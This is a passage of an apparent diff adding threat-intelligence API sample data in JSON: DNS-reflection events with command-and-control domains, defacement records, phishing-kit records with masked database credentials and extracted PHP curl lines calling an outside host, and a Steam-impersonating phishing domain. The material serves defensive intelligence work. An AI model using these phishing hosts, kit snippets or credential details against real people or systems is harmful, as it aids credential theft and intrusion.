+ "port": null, + "domain": "6lxdx.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lxdx.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868705", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11054565", + "stixGuid": "9232056c-0c7d-21a7-ac4f-a7fa243adc57", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "695e81a7379155c4c3da31056675a3f2073dd931", + "cnc": { + "cnc": "6lmqc.s3.amazonaws.com", + "port": null, + "domain": "6lmqc.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lmqc.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868443", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11058245", + "stixGuid": "6f0a316c-1c50-455b-b9e6-633aa24f7498", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "c5202c7177455777c702529a72a0f5a613c2c58a", + "cnc": { + "cnc": "plk4l.s3.amazonaws.co", + "port": null, + "domain": "plk4l.s3.amazonaws.co", + "ipv4": null, + "ipv6": null, + "url": "http://plk4l.s3.amazonaws.co" + }, + "dateBegin": "2019-10-22T22:33:35+00:00", + "dateEnd": "2019-10-22T22:34:49+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192838071", + "duration": 74, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11015631", + "stixGuid": "eb0e8ebf-f24b-7063-7702-1146335bb591", + "target": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "18.191.111.103" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "target_ip_country_name", + "target_category", + "cnc_ip_country_name", + "malware", + "cybercrime_new", + "cybercrime", + "threat_actor", + "company", + "company_id", + "type", + "options", + "target_ip", + "target_domain", + "id", + "source" + ], + "fields": [ + "target_ip", + "ip", + "target_domain", + "domain", + "target_domain.tree", + "target_ip_country_name", + "target_category", + "cnc_ip", + "cnc_ip_country_name", + "malware", + "type", + "cybercrime", + "cybercrime_new", + "threat_actor", + "seqUpdate", + "source", + "id" + ], + "sorts": [ + "last_seen", + "date_reg", + "seqUpdate" + ] + } + }, + "seqUpdate": 1677065083 + }, + "attacks/deface":{ + "count": 17197503, + "items": [ + { + "contacts": [], + "date": "2016-04-26T05:42:48Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695fabb1965600014bae7b", + "mirrorLink": "https://deface.ti-files.com/id:-59695fabb1965600014bae7b:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695fabb1965600014bae7b", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053029213, + "siteUrl": "http://med-supplies.de/?sky008", + "source": "defacer.id", + "targetDomain": "med-supplies.de", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS25504", + "city": null, + "countryCode": "DE", + "countryName": "Germany", + "ip": "89.200.168.133", + "provider": "Vautron Rechenzentrum AG", + "region": "Europe" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T05:42:48Z", + "url": "http://med-supplies.de/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:27:37Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f29b1965600014badf1", + "mirrorLink": "https://deface.ti-files.com/id:-59695f29b1965600014badf1:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f29b1965600014badf1", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053047578, + "siteUrl": "http://www.distribuidora.com.mx/?sky008", + "source": "defacer.id", + "targetDomain": "www.distribuidora.com.mx", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS36444", + "city": null, + "countryCode": "US", + "countryName": "United States", + "ip": "192.240.166.56", + "provider": "NEXCESS-NET", + "region": "North America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:27:37Z", + "url": "http://www.distribuidora.com.mx/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:18:28Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f1ab1965600014bade5", + "mirrorLink": "https://deface.ti-files.com/id:-59695f1ab1965600014bade5:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f1ab1965600014bade5", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053049467, + "siteUrl": "http://petplanetshop.com.ar/api.php?sky008", + "source": "defacer.id", + "targetDomain": "petplanetshop.com.ar", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS7303", + "city": "Rosario", + "countryCode": "AR", + "countryName": "Argentina", + "ip": "181.88.192.28", + "provider": "Telecom Argentina S.A.", + "region": "South America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:18:28Z", + "url": "http://petplanetshop.com.ar/api.php?sky008" + } + ], + "seqUpdate": 1508430053049467 + }, + "attacks/phishing_kit":{ + "count": 122834, + "items": [ + { + "id": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "hash": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "seqUpdate": 1523520752839, + "dateDetected": "2018-03-09T22:19:59+00:00", + "dateFirstSeen": "2018-03-09T22:19:59+00:00", + "dateLastSeen": "2018-03-27T13:18:38+00:00", + "downloadedFrom": [ + { + "date": "2018-03-09T22:19:59+03:00", + "url": "https://gt-mywyty186338.codeanyapp.com/cb.zip", + "phishingUrl": "", + "domain": "gt-mywyty186338.codeanyapp.com", + "fileName": "" + } + ], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606/file/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "source": [ + "ci-PhishKit" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/cargando.php", + "values": [ + "host: $mysql_host", + "login: ***********", + "password: ***************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/email-notify.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/index.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "hash": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "seqUpdate": 1523520763952, + "dateDetected": "2018-02-28T00:46:20+00:00", + "dateFirstSeen": "2018-02-28T00:46:20+00:00", + "dateLastSeen": "2018-03-27T13:18:48+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131/file/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "LOG", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "path: \"wtuds\" . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "hash": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "seqUpdate": 1523520767270, + "dateDetected": "2018-02-23T22:40:36+00:00", + "dateFirstSeen": "2018-02-23T22:40:36+00:00", + "dateLastSeen": "2018-03-27T13:18:51+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70/file/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": null, + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + } + ], + "settings": { + "search": { + "fields": [ + "company", + "domain", + "has_connection_vars", + "target_brand" + ], + "tags": [ + "203051", + "options", + "target_brand" + ] + } + }, + "seqUpdate": 1523520767270 + }, + "attacks/phishing_group":{ + "count": 8439182, + "items": [ + { + "brand": "Valve Steam", + "countPhishing": 20, + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2015-04-30T23:26:52+03:00", + "detected": "2017-10-11T20:36:03+03:00", + "blockedIndexed": null, + "updated": "2021-01-18T14:42:36+03:00" + }, + "domain": "accsteamorigin.sells.com.ua", + "domainInfo": { + "domain": "accsteamorigin.sells.com.ua", + "domainPuny": "accsteamorigin.sells.com.ua", + "expirationDate": null, + "registered": null, + "registrar": null, + "tld": "ua", + "title": "Steam Community", + "category": [] + }, + "domainTitle": "Steam Community", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "red", + "tlp": "amber", + "ttl": 0 + }, + "falsePositive": false, + "groupLifetime": 81361, + "id": "f2a145de56f5c3767eaeaa2dc8baff69ed157f4a34659b0611bf2530e3d34257", + "ip": [ + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + } + ], + "objective": [ + "Login harvest" + ], + "phishingKitArray": [], + "screenshot": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "seqUpdate": 1430425612098642, + "signature": { + "resource": [], + "screen": [], + "manual": [ + "Steam_we_see_u" + ] + }, + "source": [ + "SafeSearch" + ], + "status": 1, + "threatActor": { + "id": "", + "name": "", + "nameIndexed": "", + "isAPT": false + }, + "uniqueTitles": [ + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + } + ], + "urlListLink": "", + "whitelist": false, + "phishing": [ + { + "id": "4c6c37c06977d8ba6ea9c3e356af7bbd248a1a6a189b4720c5fcb2d67dbc0254", + "url": "http://accsteamorigin.sells.com.ua/products?sort=default&size=30", + "date": { + "blocked": "2017-11-18T00:40:56+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "filetype": "pageHtml", + "filename": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bce7ef8bfc136d48ffe2888f4d8b9fa9e14640bb5901bdbcfc075e3ac4eeacb7", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=4", + "date": { + "blocked": "2017-11-14T08:16:01+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "filetype": "pageScreen", + "filename": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "0f41b79fd897eaf5b6950a09712f3a0c7cc3042389beb813a2f021473bec6726", + "url": "http://accsteamorigin.sells.com.ua/products?page=5&sort=cheap", + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2017-11-04T16:38:46+03:00", + "detected": "2017-11-04T16:38:46+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "793197298b0240d00fd6717014e0fa30db98f7bf867254124d9a221ff9097fa6", + "url": "http://accsteamorigin.sells.com.ua/products?page=1&sort=cheap", + "date": { + "blocked": "2017-12-07T07:24:00+03:00", + "added": "2017-10-11T23:07:34+03:00", + "detected": "2017-10-11T23:07:34+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52688b4712a11e4266f3acabb80872a69b251ea3484ca7f810dd2ef705947342", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&page=1&size=30", + "date": { + "blocked": "2017-12-07T07:23:55+03:00", + "added": "2017-10-11T22:58:59+03:00", + "detected": "2017-10-11T22:58:59+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "filetype": "pageHtml", + "filename": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "filetype": "pageScreen", + "filename": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "afcd42feb05c0b9b4e725e4266bd1e9ca092627706f954750f7ec38b168e7820", + "url": "http://accsteamorigin.sells.com.ua/command-conquer-red-alert-3/p27", + "date": { + "blocked": "2017-11-07T05:06:19+03:00", + "added": "2017-10-11T22:45:22+03:00", + "detected": "2017-10-11T22:45:22+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "filetype": "pageHtml", + "filename": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "filetype": "pageScreen", + "filename": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "32268ec99874164fb09655e899adcc44964a9b88844919fc9b6fc0930d188344", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:20+03:00", + "detected": 